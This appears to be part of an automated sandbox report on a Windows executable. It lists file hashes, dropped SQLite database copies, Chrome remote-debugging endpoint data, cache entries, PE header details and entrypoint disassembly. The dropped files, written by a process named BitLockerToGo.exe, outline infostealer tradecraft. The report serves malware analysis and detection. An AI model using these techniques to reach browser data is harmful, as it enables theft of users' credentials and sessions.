                                                                                                                                                                                                                                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    C:\ProgramData\riwlf\u3opp8

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):159744
                                                                                                                                                                                                                                    Entropy (8bit):0.7873599747470391
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                                                                    MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                                                                    SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                                                                    SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                                                                    SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\json[1].json

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                                                                    Entropy (8bit):5.373990399180097
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:SfNaoCA90TECAAfNaoCc4ACczfNaoCZCDfNaoC+Vg0UrU0U8CG:6NnCA90TECAMNnCc4ACcrNnCZC7NnCRb
                                                                                                                                                                                                                                    MD5:4C66234D60BBAC7C500CCA15A64A8B3A
                                                                                                                                                                                                                                    SHA1:89CA843027D46A21B9687D3A7B54D07C1FC193EC
                                                                                                                                                                                                                                    SHA-256:F353E83FBF68377E8089CB1FB0DB5CA333CDEAF4E86FE087569428C9CB4F4C67
                                                                                                                                                                                                                                    SHA-512:E2A8CD1EF897A5410A10CEBAB061782AA9362ECC5353EECBB41A183EE1D87ADF48FB473759F55991F0A811ACBA2A7AFAC3DF7553C5464A84CADE8106D85A3200
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/43E2C53D32326A61ECA6EB5A739FF3C8",.. "id": "43E2C53D32326A61ECA6EB5A739FF3C8",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/43E2C53D32326A61ECA6EB5A739FF3C8"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/B25D0D9CECAD27DD88F08C7B69728BAE",.. "id": "B25D0D9CECAD27DD88F08C7B69728BAE",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/B25D0D9CECAD27DD88F08C7B69728BAE"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                    Chrome Cache Entry: 61

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2291)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):2296
                                                                                                                                                                                                                                    Entropy (8bit):5.837558673380625
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:x8sKlgZ01d1YV+8hZno+SGe5N0/uvpEzyo2/xRQYhdBPKbH+Z9kOLPCAapquSEqA:ElibphZo+Tev0/cuHgx7/ZKr+Z931apD
                                                                                                                                                                                                                                    MD5:EED8ECB4D3592881E58FAB17C67423F8
                                                                                                                                                                                                                                    SHA1:48A7DA9155D8A3DA0B4822E3F84E3F48B324572C
                                                                                                                                                                                                                                    SHA-256:BBC09498D49B9233714DFE11375E176391E6CE2764401C409CB85686F26DD360
                                                                                                                                                                                                                                    SHA-512:A3C2FDA130E97944B68AFC830C2D8F8D42CC4326A14ACAD000CD75E71194A682FF064C0EA4F4A2ED61135A5E788A6E21867E3EB2F36A0D9BFB5332A531F24133
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                    Preview:)]}'.["",["tiktok banned","general hospital spoilers michael","finspan fish","ces 2025 technology","new york giants","winter storm nashville tn","will trent season 3","mega millions jackpot lottery numbers"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wNWdnNBINRm9vdGJhbGwgdGVhbTLSB2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRUFBQUFCQUNBTUFBQUNkdDRIc0FBQUFwVkJNVkVYLy8vOEtJV1FBSVdZQUlXWEtnb2gwQno2bkFBQmNGVTI1VGxqMjZ1enEwTlAzN2U3UmxKcCtBRGVnQUJhTUFDdGhFa25icjdLOVhXWlhGazZ4S2pxaEFBQ0tBQzdacWExUEdsU29BQkdhQUFCWEhGSWRJR0g3OWZZbklGL0lmWVRseDhyQ2RIeUVBREt0RmlwRkhWZTFGeVZvRzB6eDRlT1FFamFWQUNaL0dVSzRSMUp2RlVaaEcwNnRBQnA4Q3p5Y0FCczRIMXV5T1VlbEdDK2hBQ1dTQUI3ZnViNEpMdGtLQUFBQjRVbEVRVlJZaGUyVjIzYWlNQlJBUTRLcFhJVEJDbWlWbXpDMVZGc2RTLzMvVDV1VEM1UWxLeldkdnN6TVlqK1JuR1NUa0pNRFFpTWoveEdKMV

                                                                                                                                                                                                                                    Chrome Cache Entry: 62

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2410)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):176106
                                                                                                                                                                                                                                    Entropy (8bit):5.550039490877255
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:eEBOdc32TMLUtSdEsN4FP5/278Ivoh9NmxVhTaLB80G5JCk2mlNwfQuJq+CjQDI/:eKOdcPLUtSdn4P5/y8Iwh9NmX5aLB80o
                                                                                                                                                                                                                                    MD5:D64C0D9594ACD5B48E6C6A4A48494A2C
                                                                                                                                                                                                                                    SHA1:F39C02870860A3F0563B47D753699E8095578DFE
                                                                                                                                                                                                                                    SHA-256:A2E707230996D82F27A3EC406290353D4DF89A967693D454A57E14896509D87B
                                                                                                                                                                                                                                    SHA-512:F6DA048855D3B2D05F0A11E90206209FF991EEEA1926A298B17D1DE48E85E1E2334CF7885C772AB109FCC372FB5B6DA8A328AC901653C87CDAFC3B0A9607D3C4
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.rX6uZdQxZxU.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTvH0Rknr6hXqx-tgqAUuIv05wLZhQ"
                                                                                                                                                                                                                                    Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj||(_.bj=new cj)).set(a,b);(_.dj||(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.xb(a,b,c);return Array.isArray(a)?a:_.Hc};._.jj=function(a,b){a=2&b?a|2:a&-3;return(a|32)&-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a|1};_.lj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.mj=function(a,b,c){32&b&&c||(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_

                                                                                                                                                                                                                                    Chrome Cache Entry: 63

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                    Chrome Cache Entry: 64

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):133193
                                                                                                                                                                                                                                    Entropy (8bit):5.4356288742973256
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:fSk2hK+G05hzyxT+BVAkYocAPrfuZUY2i6e:f8hZJy1JkYocAPrf6UY8e
                                                                                                                                                                                                                                    MD5:B6C8AC2E99EA92AE2370877208148304
                                                                                                                                                                                                                                    SHA1:FF0B209E6E671F65AF70ACED68BAFE4E3E4A74B2
                                                                                                                                                                                                                                    SHA-256:AE3F1A7B477B3174DEFAE67A6B6634A4EB528826683B31EBEBE91158B6C31647
                                                                                                                                                                                                                                    SHA-512:D3679756959A5C1E8481194EBCCE011760112BD5B8994C20856AEEA9C3F79B215561581979F726842DDBD200B5F9D18792C56D8A521D4BCF93619664A7F7523C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                    Chrome Cache Entry: 65

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1395)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):117446
                                                                                                                                                                                                                                    Entropy (8bit):5.490775275046353
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:3072:T2yvefrtJUEgK3Cvw3wWs/ZuTZVL/G1kL:T2y4tJbDK0L/G1kL
                                                                                                                                                                                                                                    MD5:942EA4F96889BAE7D3C59C0724AB2208
                                                                                                                                                                                                                                    SHA1:033DDF473319500621D8EBB6961C4278E27222A7
                                                                                                                                                                                                                                    SHA-256:F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
                                                                                                                                                                                                                                    SHA-512:C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:"https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0"
                                                                                                                                                                                                                                    Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

                                                                                                                                                                                                                                    Chrome Cache Entry: 66

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                                                    Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                    MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                    SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                    SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                    SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.CEsjJf2wziM.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTvDtorsWuiBHYzP5-lS7pwgoAa95g"
                                                                                                                                                                                                                                    Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

                                                                                                                                                                                                                                    Chrome Cache Entry: 67

                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                                                    Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

                                                                                                                                                                                                                                    Static File Info

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                    Entropy (8bit):6.4333795173785076
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                    File name:DyM4yXX.exe
                                                                                                                                                                                                                                    File size:5'594'624 bytes
                                                                                                                                                                                                                                    MD5:67b35433e066311e95419af40384dd92
                                                                                                                                                                                                                                    SHA1:07f235c346f8e9ead0342f0249ff4f2ca0a9dd79
                                                                                                                                                                                                                                    SHA256:ef35b2565f53ea0320bf89a40de1589cf72ee363539da934c921d8b9ebccd7a3
                                                                                                                                                                                                                                    SHA512:eac8a0bd11d0c67698bbf189ba6e31d04f781f5a1a7695c81e572ceeca5b470d32a5707304c3bdee1291f71e7ba44a6ddb2f778a5f24eb1676e069988ce54587
                                                                                                                                                                                                                                    SSDEEP:49152:EZ56i1Ees+IdVGHMq40r5QrKiENtuJOmdMZlFXEmK4SacLrbzJy+EDKHy6k1Koy:Ej6i15wdVGHM9Q5tN2h/Fy+H9
                                                                                                                                                                                                                                    TLSH:F8463A90F9DB54F5DA0359310497A23F6730AD098B38DFD7EA107F59E873AA20A33619
                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........\U..............\'..r.......K........P...@..........................pX...........@................................

                                                                                                                                                                                                                                    File Icon

                                                                                                                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                                                                                                                    Static PE Info

                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                    Entrypoint:0x464b10
                                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                    Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                                                                    Import Hash:9cbefe68f395e67356e2a5d8d1b285c0

                                                                                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                    jmp 00007F940CE4F790h
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                                                                                    mov dword ptr [esp+10h], ebp
                                                                                                                                                                                                                                    mov dword ptr [esp+14h], esi
                                                                                                                                                                                                                                    mov dword ptr [esp+18h], edi
                                                                                                                                                                                                                                    mov esi, eax
                                                                                                                                                                                                                                    mov edx, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                    cmp edx, 00000000h
                                                                                                                                                                                                                                    jne 00007F940CE51AC9h
                                                                                                                                                                                                                                    mov eax, 00000000h
                                                                                                                                                                                                                                    jmp 00007F940CE51B26h
                                                                                                                                                                                                                                    mov edx, dword ptr [edx+00000000h]
                                                                                                                                                                                                                                    cmp edx, 00000000h
                                                                                                                                                                                                                                    jne 00007F940CE51AC7h
                                                                                                                                                                                                                                    call 00007F940CE51BB9h
                                                                                                                                                                                                                                    mov dword ptr [esp+20h], edx
                                                                                                                                                                                                                                    mov dword ptr [esp+24h], esp
                                                                                                                                                                                                                                    mov ebx, dword ptr [edx+18h]
                                                                                                                                                                                                                                    mov ebx, dword ptr [ebx]
                                                                                                                                                                                                                                    cmp edx, ebx
                                                                                                                                                                                                                                    je 00007F940CE51ADAh
                                                                                                                                                                                                                                    mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                    mov dword ptr [ebp+00000000h], ebx
                                                                                                                                                                                                                                    mov edi, dword ptr [ebx+1Ch]
                                                                                                                                                                                                                                    sub edi, 28h
                                                                                                                                                                                                                                    mov dword ptr [edi+24h], esp
                                                                                                                                                                                                                                    mov esp, edi
                                                                                                                                                                                                                                    mov ebx, dword ptr [ecx]
                                                                                                                                                                                                                                    mov ecx, dword ptr [ecx+04h]
                                                                                                                                                                                                                                    mov dword ptr [esp], ebx
                                                                                                                                                                                                                                    mov dword ptr [esp+04h], ecx
                                                                                                                                                                                                                                    mov dword ptr [esp+08h], edx
                                                                                                                                                                                                                                    call esi
                                                                                                                                                                                                                                    mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                    mov esp, dword ptr [esp+24h]
                                                                                                                                                                                                                                    mov edx, dword ptr [esp+20h]
                                                                                                                                                                                                                                    mov ebp, dword ptr fs:[00000014h]
                                                                                                                                                                                                                                    mov dword ptr [ebp+00000000h], edx
                                                                                                                                                                                                                                    mov edi, dword ptr [esp+18h]
                                                                                                                                                                                                                                    mov esi, dword ptr [esp+14h]
                                                                                                                                                                                                                                    mov ebp, dword ptr [esp+10h]
                                                                                                                                                                                                                                    mov ebx, dword ptr [esp+1Ch]
                                                                                                                                                                                                                                    add esp, 28h
                                                                                                                                                                                                                                    retn 0004h
                                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                                    int3
